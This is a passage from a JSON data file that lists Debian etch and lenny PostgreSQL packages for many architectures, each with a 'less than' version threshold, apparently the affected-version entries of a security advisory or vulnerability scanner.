"postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19.orig", "arch": "src", "packageFilename": "postgresql-8.1_8.1.19.orig.tar.gz", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_mipsel.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libpq4_8.1.19-0etch1_i386.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9.orig", "arch": "src", "packageFilename": "postgresql-8.3_8.3.9.orig.tar.gz", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "libecpg6_8.3.9-0lenny1_mips.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1.diff", "arch": "src", "packageFilename": "postgresql-7.4_7.4.27-0etch1.diff.gz", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libpq5_8.3.9-0lenny1_alpha.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libpq-dev_8.3.9-0lenny1_sparc.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_i386.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mips", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_mips.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libecpg5_8.1.19-0etch1_powerpc.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_i386.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "i686", "packageFilename": "libecpg-dev_8.3.9-0lenny1_i386.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libpgtypes3_8.3.9-0lenny1_armel.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libecpg-dev_8.3.9-0lenny1_sparc.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libpgtypes2_8.1.19-0etch1_amd64.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libecpg5_8.1.19-0etch1_sparc.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_mipsel.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-pltcl-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-pltcl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "mipsel", "packageFilename": "postgresql-pltcl-7.4_7.4.27-0etch1_mipsel.deb", "packageName": "postgresql-pltcl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_s390.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "libecpg5_8.1.19-0etch1_alpha.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_alpha.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "libpq-dev_8.1.19-0etch1_alpha.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libecpg-compat2_8.1.19-0etch1_hppa.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libpq5_8.3.9-0lenny1_amd64.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libpq-dev_8.1.19-0etch1_arm.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libecpg-dev_8.1.19-0etch1_powerpc.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libpgtypes3_8.3.9-0lenny1_mipsel.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "libecpg-compat2_8.1.19-0etch1_alpha.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "libecpg6_8.3.9-0lenny1_armel.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libpq-dev_8.1.19-0etch1_mipsel.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "armel", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_armel.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "i686", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_i386.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "libecpg-dev_8.1.19-0etch1_hppa.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libpq4_8.1.19-0etch1_mips.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "hppa", "packageFilename": "postgresql-7.4_7.4.27-0etch1_hppa.deb", "packageName": "postgresql-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "alpha", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_alpha.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libpq-dev_8.3.9-0lenny1_alpha.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "libpq-dev_8.1.19-0etch1_mips.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "i686", "packageFilename": "libecpg-dev_8.1.19-0etch1_i386.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "libpq5_8.3.9-0lenny1_mipsel.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "libecpg-dev_8.1.19-0etch1_sparc.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "sparc", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_sparc.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libpq-dev_8.3.9-0lenny1_s390.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-pltcl-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-pltcl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libpq4_8.1.19-0etch1_amd64.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libecpg-dev_8.1.19-0etch1_arm.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "all", "packageFilename": "postgresql-doc-8.3_8.3.9-0lenny1_all.deb", "packageName": "postgresql-doc-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "sparc", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_sparc.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_s390.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_amd64.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "postgresql-8.3_8.3.9-0lenny1_amd64.deb", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "postgresql-server-dev-8.1_8.1.19-0etch1_arm.deb", "packageName": "postgresql-server-dev-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "hppa", "packageFilename": "postgresql-contrib-8.1_8.1.19-0etch1_hppa.deb", "packageName": "postgresql-contrib-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libecpg-compat3_8.3.9-0lenny1_sparc.deb", "packageName": "libecpg-compat3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "s390x", "packageFilename": "libpq-dev_8.1.19-0etch1_s390.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "arm", "packageFilename": "libecpg5_8.1.19-0etch1_arm.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "arm", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_arm.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mipsel", "packageFilename": "libecpg5_8.1.19-0etch1_mipsel.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_powerpc.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "postgresql-client-8.3_8.3.9-0lenny1_ia64.deb", "packageName": "postgresql-client-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mipsel", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_mipsel.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "libecpg-dev_8.3.9-0lenny1_arm.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "postgresql-plpython-8.3_8.3.9-0lenny1_sparc.deb", "packageName": "postgresql-plpython-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libecpg-compat2_8.1.19-0etch1_ia64.deb", "packageName": "libecpg-compat2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libpgtypes2_8.1.19-0etch1_powerpc.deb", "packageName": "libpgtypes2", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "libpq-dev_8.1.19-0etch1_amd64.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "libecpg5_8.1.19-0etch1_ia64.deb", "packageName": "libecpg5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "s390x", "packageFilename": "postgresql-client-7.4_7.4.27-0etch1_s390.deb", "packageName": "postgresql-client-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "mips", "packageFilename": "postgresql-plperl-8.1_8.1.19-0etch1_mips.deb", "packageName": "postgresql-plperl-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libpgtypes3_8.3.9-0lenny1_s390.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ia64", "packageFilename": "postgresql-client-8.1_8.1.19-0etch1_ia64.deb", "packageName": "postgresql-client-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "mips", "packageFilename": "postgresql-server-dev-8.3_8.3.9-0lenny1_mips.deb", "packageName": "postgresql-server-dev-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "ppc", "packageFilename": "postgresql-contrib-7.4_7.4.27-0etch1_powerpc.deb", "packageName": "postgresql-contrib-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "postgresql-plpython-8.1_8.1.19-0etch1_powerpc.deb", "packageName": "postgresql-plpython-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "ppc", "packageFilename": "libpq4_8.1.19-0etch1_powerpc.deb", "packageName": "libpq4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "hppa", "packageFilename": "postgresql-plperl-8.3_8.3.9-0lenny1_hppa.deb", "packageName": "postgresql-plperl-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ia64", "packageFilename": "libecpg-dev_8.3.9-0lenny1_ia64.deb", "packageName": "libecpg-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "alpha", "packageFilename": "libpgtypes3_8.3.9-0lenny1_alpha.deb", "packageName": "libpgtypes3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "ppc", "packageFilename": "libecpg6_8.3.9-0lenny1_powerpc.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "x86-64", "packageFilename": "libpq-dev_8.3.9-0lenny1_amd64.deb", "packageName": "libpq-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "sparc", "packageFilename": "libecpg6_8.3.9-0lenny1_sparc.deb", "packageName": "libecpg6", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "s390x", "packageFilename": "libpq5_8.3.9-0lenny1_s390.deb", "packageName": "libpq5", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "x86-64", "packageFilename": "postgresql-plpython-7.4_7.4.27-0etch1_amd64.deb", "packageName": "postgresql-plpython-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "8.1.19-0etch1", "arch": "x86-64", "packageFilename": "postgresql-8.1_8.1.19-0etch1_amd64.deb", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "8.3.9-0lenny1", "arch": "arm", "packageFilename": "postgresql-contrib-8.3_8.3.9-0lenny1_arm.deb", "packageName": "postgresql-contrib-8.3", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "7.4.27-0etch1", "arch": "alpha", "packageFilename": "postgresql-plperl-7.4_7.4.27-0etch1_alpha.deb", "packageName": "postgresql-plperl-7.4", "operator": "lt"}, {"OS": "Debian GNU/Linux", 